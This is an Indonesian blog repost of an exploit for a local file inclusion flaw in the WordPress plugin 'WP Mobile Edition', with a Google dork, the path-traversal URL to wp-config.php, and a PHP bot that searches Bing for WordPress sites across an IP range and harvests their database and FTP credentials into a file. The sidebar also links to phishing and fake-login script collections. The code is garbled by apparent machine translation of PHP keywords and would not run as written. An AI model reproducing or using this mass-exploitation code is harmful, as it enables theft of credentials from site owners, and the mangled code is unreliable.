Plugin WordPress 'WP Mobile Edition' LFI Vulnerability

Oleh chmood

Oktober 10, 2015

#######################################
# Exploit Judul: WordPress Plugin 'WP Mobile Edition' LFI Vulnerability #
# Tanggal: 6 Juni 2015 #
# Exploit Penulis: Virus OS #
# Google Dork: iilnurl:? Fdx_switcher = Mobe #
# Penjual Homepage: https://wordpress.org/plugins/wp-mobile-edition/ #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip #
# Versi: WP Mobile Edition Versi 2.2.7 #
# Diuji pada: jendela #
########################################
Keterangan:
Wordpress Plugin 'WP Mobile Edition' tidak menyaring data sehingga kita bisa mendapatkan file configration di jalan
<Site.com/wp-content/themes/mTheme-Unus/css/css.php?files = .. / .. / .. / .. / wp-config.php>

# Exploite Kode:
<? php
// Virus OS
set_time_limit (0);
error_reporting (0);
echo "############### Fdx_Switcher Minibot Dengan ip Rentang ################## \ n \ n";
print "Kode By _
__ _ (_) _ __ _ _ ___ ___ ___
\ \ / / | '__ | | | / __ | / _ \ / __ |
\ V / | | | | | _ | \ __ \ | (_) \ __ \
\ _ / | _ | _ | \ __, _ | ___ / \ ___ / | ___ /
Menyapa >> CoderLeeT | Fallag Gassrini | Taz | S4hk | Sir Matrix | Kuroi'SH
";
echo "Follow Me On FaceBook: https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook: https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Selamat Guru Virus OS ################ \ n \ n";
echo "Server Sasaran IP:";
$ ip = trim (fgets (STDIN, 1024));
$ ip = meledak (, $ ip '.');
. '.'.. '.'. $ ip = $ ip [0] $ ip [1] $ ip [2]. '.';
untuk ($ i = 0; $ i <= 255; $ i ++)
{
$ situs = array_map ("situs", bing ("ip: $ ip $ i wordpress."));
$ un = array_unique ($ situs);
echo "[+] Scanning ->", $ ip $ i, "\ n";. "."
echo "Ditemukan:" Count ($ situs) "situs \ n \ n";.
foreach ($ un sebagai $ pok) {
$ host = findit ($ file, "DB_HOST ','", "');");
$ db = findit ($ file, "DB_NAME ','", "');");
$ kita = findit ($ file, "DB_USER ','", "');");
$ pw = findit ($ file, "DB_PASSWORD ','", "');");
$ bda = "http: // $ pok";
$ linkof = '/ wp-content / themes / mTheme-Unus / css / css.php file = .. / .. / .. / .. / wp-config.php?';
$ dn = ($ bda) ($ linkof).;
$ file = @ file_get_contents ($ dn);
if (eregi ('DB_HOST', $ file) dan! eregi ('FTP_USER', $ file)) {
.. echo "[+] Scanning =>" $ bda "\ n \ n";
echo "[+] DB NAME:" .findit ($ file, "DB_NAME ','", "');") "\ n \ n";.
echo "[+] DB USER:" .findit ($ file, "DB_USER ','", "');") "\ n \ n";.
echo "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
echo "[+] DB host:" .findit ($ file, "DB_HOST ','", "');") "\ n \ n";.
$ db = "[+] DB NAME:". .findit ($ file, "DB_NAME ','", "');") "\ n \ n";
$ user = "[+] DB PENGGUNA:". .findit ($ file, "DB_USER ','", "');") "\ n \ n";
$ pass = "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
$ host = "[+] DB host:". .findit ($ file, "DB_HOST ','", "');") "\ n \ n";
$ ux = "" $ bda.. "\ r \ n";
$ ux1 = "". $ db. "\ r \ n";
$ UX2 = "" $ user.. "\ r \ n";
$ ux3 = "". $ lulus. "\ r \ n";
$ ux4 = "" $ host.. "\ r \ n";
$ menyelamatkan = fopen ('exploited.txt', 'ab');
fwrite ($ simpan, "$ ux");
fwrite ($ simpan, "$ ux1");
fwrite ($ simpan, "$ UX2");
fwrite ($ simpan, "$ ux3");
fwrite ($ simpan, "$ ux4");
}
elseif (eregi ('DB_HOST', $ file) dan eregi ('FTP_USER', $ file)) {
echo "user FTP:" .findit ($ file, "FTP_USER ','", "');") "\ n \ n";.
echo "FTP lulus:" .findit ($ file, "FTP_PASS ','", "');") "\ n \ n";.
echo "FTP host:" .findit ($ file, "FTP_HOST ','", "');") "\ n \ n";.
}
else {echo $ bda ": Eksploitasi gagal \ n \ n";.}
}
}
Fungsi findit ($ mytext, $ StartTag, $ EndTag) {
$ posLeft = stripos ($ mytext, $ StartTag) + strlen ($ StartTag);
$ posRight = stripos ($ mytext, $ EndTag, $ posLeft + 1);
pulang substr ($ mytext, $ posLeft, $ posRight- $ posLeft);
}
situs function ($ link) {
kembali str_replace ("", "", parse_url ($ link PHP_URL_HOST));
}
Fungsi bing ($ apa) {
untuk ($ i = 1; $ i <= 2000; $ i + = 10) {
$ ch = curl_init ();
curl_setopt ($ ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($ ch, CURLOPT_USERAGENT, "msnbot / 1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ ch, CURLOPT_COOKIEFILE, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_COOKIEJAR, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1);
$ data = curl_exec ($ ch);
preg_match_all ('#;? a = (*) "h =" #.', $ data, $ link);
foreach ($ link [1] sebagai $ link) {
$ allLinks [] = $ Link;
}
jika istirahat (preg_match ('# "sw_next" #', $ data)!);
}

if (! empty ($ allLinks) && is_array ($ allLinks)) {
kembali array_unique (array_map ("urldecode", $ allLinks));
}
}

Category

Dork Exploitations

Komentar

Postingan Lebih Baru Postingan Lama

Plugin WordPress 'WP Mobile Edition' LFI Vulnerability

Backlink dengan Google Dork Seo

Cara Dapat Backlink dengan Google Dork

Lowongan Pekerjaan PT HM Sampoerna Tbk, Hari Ini Agustus 2023

Cara Dapat Backlink Edu Gratis

Hacking Jcow Social Networking Webserver

Kumpulan Phising & Fake Login Script

DOWNLOAD APP SCRAPEBOX PREMIUM FREE SEO

SEC ADMIN LOGIN DORK SQL LOGIN

TULISAN TERBALIK

App Baca Buku Pdf, Epub, Word, Mobi, Kindle, Android Tampa Iklan ReadEra